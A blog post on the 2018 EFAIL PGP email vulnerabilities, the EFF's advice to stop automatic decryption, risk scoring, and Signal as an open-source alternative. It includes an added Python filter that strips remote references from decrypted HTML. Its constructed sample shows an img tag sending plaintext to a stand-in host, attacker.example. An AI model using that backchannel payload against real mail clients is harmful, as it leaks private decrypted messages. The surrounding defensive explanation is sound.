Efail: The facts and fads

Maybe you have noticed it: privacy is an issue again. The timing is a bit strange, since there are only 10 days left until the new EU General Data Protection Regulation (GDPR) becomes fully enforceable throughout the European Union.

So by the end of May 2018 every organization that processes data of EU citizens must comply with the GDPR, and determining how to design and improve your systems to meet it is not straightforward. Meanwhile, everyone who protects their email communications with PGP (Pretty Good Privacy) is wide awake again: the clear advice from the Electronic Frontier Foundation (EFF) is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. People who live in a country whose government is not so friendly towards people with different opinions are understandably afraid.

The advice is sound: take no more risks.

But what is missing from the initial EFF statement is the rationale behind this advice, so an online storm of criticism hit the EFF. The EFF based its advice on research by German security researchers. The full EFAIL research can be found here.

All security and privacy professionals know that a risk analysis must take into account the sensitivity of the data processed and stored by systems, as well as the likelihood and impact of potential threat events. Based on the current PGP research, the potential threats to PGP-secured email can in essence be organized into three main categories.

  • Loss of confidentiality: if you used PGP for your emails, their decrypted content can be disclosed to an attacker, so loss of confidentiality is possible.
  • Loss of integrity: the content may be tampered with, so your emails can no longer be trusted.
  • Loss of availability: not really applicable to the threats found. The advice is to stop using PGP mail now and choose an alternative.
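To make the loss-of-confidentiality category concrete: the EFAIL attacks leak decrypted plaintext by letting the mail client render it inside an HTML element that fetches a remote URL, so the plaintext leaves the machine as part of that request. The Python below is an added example, not code from this blog post, the EFF or the EFAIL researchers. It assumes a mail client that hands the decrypted HTML body through a filter before rendering it, and uses a constructed, simplified message (the host attacker.example is made up) to show the shape of that channel and how a filter would catch it. It does not replace the EFF advice: a client that never decrypts automatically has no such body to render in the first place.

```python
"""Scrub EFAIL-style HTML backchannels from a decrypted mail body.

Added example: assumes a mail client that decrypts a PGP part and would hand the
resulting HTML through this filter before rendering it.  It is not the blog's,
the EFF's or the EFAIL researchers' code.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Anything with these schemes (or a scheme-relative //host) makes the renderer talk to the network.
REMOTE_SCHEMES = {"http", "https", "ftp"}
# Attributes whose value is fetched when the element is rendered or activated.
URL_ATTRS = {"src", "href", "background", "poster", "action", "data", "formaction"}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)


def is_remote(url: str) -> bool:
    """True when a renderer would fetch this URL from the network."""
    url = url.strip()
    return url.startswith("//") or urlsplit(url).scheme.lower() in REMOTE_SCHEMES


class BackchannelScrubber(HTMLParser):
    """Re-emits the HTML while dropping every attribute and <style> block that points
    at a remote host.  Removed references are collected in .flagged so the client
    can warn the user that the message tried to contact a network host."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.flagged = []
        self._in_style = False

    def _attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            value = value or ""
            lname = name.lower()
            if lname in URL_ATTRS and is_remote(value):
                self.flagged.append((tag, lname, value))
                continue
            if lname == "style" and any(is_remote(u) for u in CSS_URL.findall(value)):
                self.flagged.append((tag, lname, value))
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        self._in_style = tag.lower() == "style"
        self.out.append(f"<{tag}{self._attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(tag, attrs)}/>")

    def handle_endtag(self, tag):
        self._in_style = False
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._in_style:
            remote = [u for u in CSS_URL.findall(data) if is_remote(u)]
            if remote:
                self.flagged.extend(("style", "css", u) for u in remote)
                data = "/* stylesheet removed: it referenced a remote host */"
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # comments cannot fetch anything; dropping them is harmless

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def scrub_decrypted_body(body: str):
    """Return (safe_html, flagged) for a decrypted HTML body."""
    parser = BackchannelScrubber()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.flagged


# Constructed sample (simplified): the attacker re-sends the victim's ciphertext inside an
# HTML mail that opens <img src="http://attacker.example/ before the encrypted part and
# closes the quote after it.  Once the client decrypts the middle part, the plaintext sits
# inside the image URL and would be sent to attacker.example as soon as it is rendered.
PLAINTEXT = "Meet me at the station at 9"
ATTACKER_MAIL = ('<html><body><img src="http://attacker.example/' + PLAINTEXT
                 + '"><p>Hello</p></body></html>')

if __name__ == "__main__":
    safe, flagged = scrub_decrypted_body(ATTACKER_MAIL)
    for tag, attr, url in flagged:
        print(f"blocked {tag}@{attr}: {url}")
    print(safe)
```

Local references such as `cid:` images or `mailto:` links pass through untouched; every remote reference is stripped and reported, which turns a silent exfiltration into a visible warning. The filter only covers the HTML channel, which is why disabling HTML rendering or decrypting outside the client remains the safer choice.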

The difficulty is that you need to classify whether the likelihood of a disaster happening with your PGP email is unlikely, possible, likely or very likely. This depends on your specific context, which is why general security and privacy advice is so often disputed. The EFF advice is a safe one for almost all use cases: now that it is clear and proven that PGP email (more precisely, the way mail clients handle decrypted PGP content) is vulnerable, the impact on many people's lives is simply severe. In the end, risk impacts are not technical; they are always impacts on businesses, or on people's safety or privacy.

Risk levels can be calculated as the product of the LIKELIHOOD and the IMPACT of a potential threat event or threat event category. See the matrix below.


Risk model

The only thing that really should be discussed about the EFF EFAIL advice is the recommendation to use Signal for secure communications now. Signal is distributed under the GPLv3 for the client software and the AGPLv3 for the servers, so it is almost as open as possible. There is only one thing that keeps hurting Signal for truly paranoid users: the Signal software is built with proprietary dependencies on Google libraries.

Since Signal is used by many people worldwide, good audits have been performed and public audit reports exist, and the Signal software is a good target for security researchers looking for vulnerabilities. The more people who can check the quality of software, the better it will become. This is the power of using OSS for security and privacy products. Closed commercial software is often based on the principle of 'security by obscurity', and history has shown that trust in such software is too often betrayed.

Signal, like other OSS software, is fully transparent when it comes to privacy and security aspects. OSS software is well positioned to ensure privacy when it comes to your digital footprint; Free Software is probably the only way to ensure that.

This blog post will be added (after a rewrite) as an extension to the 'Open Reference Architecture for Security and Privacy'. We are working on a renewed version. Please join us!